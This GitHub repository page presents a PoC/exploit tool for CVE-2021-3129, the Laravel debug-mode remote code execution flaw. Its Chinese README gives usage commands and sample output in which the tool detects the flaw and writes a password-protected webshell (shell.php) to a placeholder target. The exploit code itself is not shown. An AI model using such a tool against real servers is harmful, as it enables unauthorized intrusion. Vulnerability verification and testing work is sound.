Skip to content

ajisai-babu/CVE-2021-3129-exp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

Laravel Debug mode RCE漏洞(CVE-2021-3129)poc / exp

CVE-2021-3129 exp / poc

  • 注意⚠️:因该漏洞利用与检测会发送多次请求,可能导致利用与检测过程缓慢
  • usage:
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp

Laravel Debug mode RCECVE-2021-3129POC & EXP

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     指定目标url地址
  -e, --exp             利用漏洞写入webshell如不指定则仅进行漏洞检测
  -p PROXY, --proxy PROXY
                        设置代理如socks5://127.0.0.1:7890
  • example:
# poc
python CVE-2021-3129.py -u http://xxxxx.com 
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64

# exp
python CVE-2021-3129.py -u http://xxxxx.com --exp                     
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64 
[OK] 成功写入webshell, 访问地址 http://xxxxx.com/shell.php , 密码 whoami

# proxy
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890

About

Laravel Debug mode RCE漏洞(CVE-2021-3129)poc / exp

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages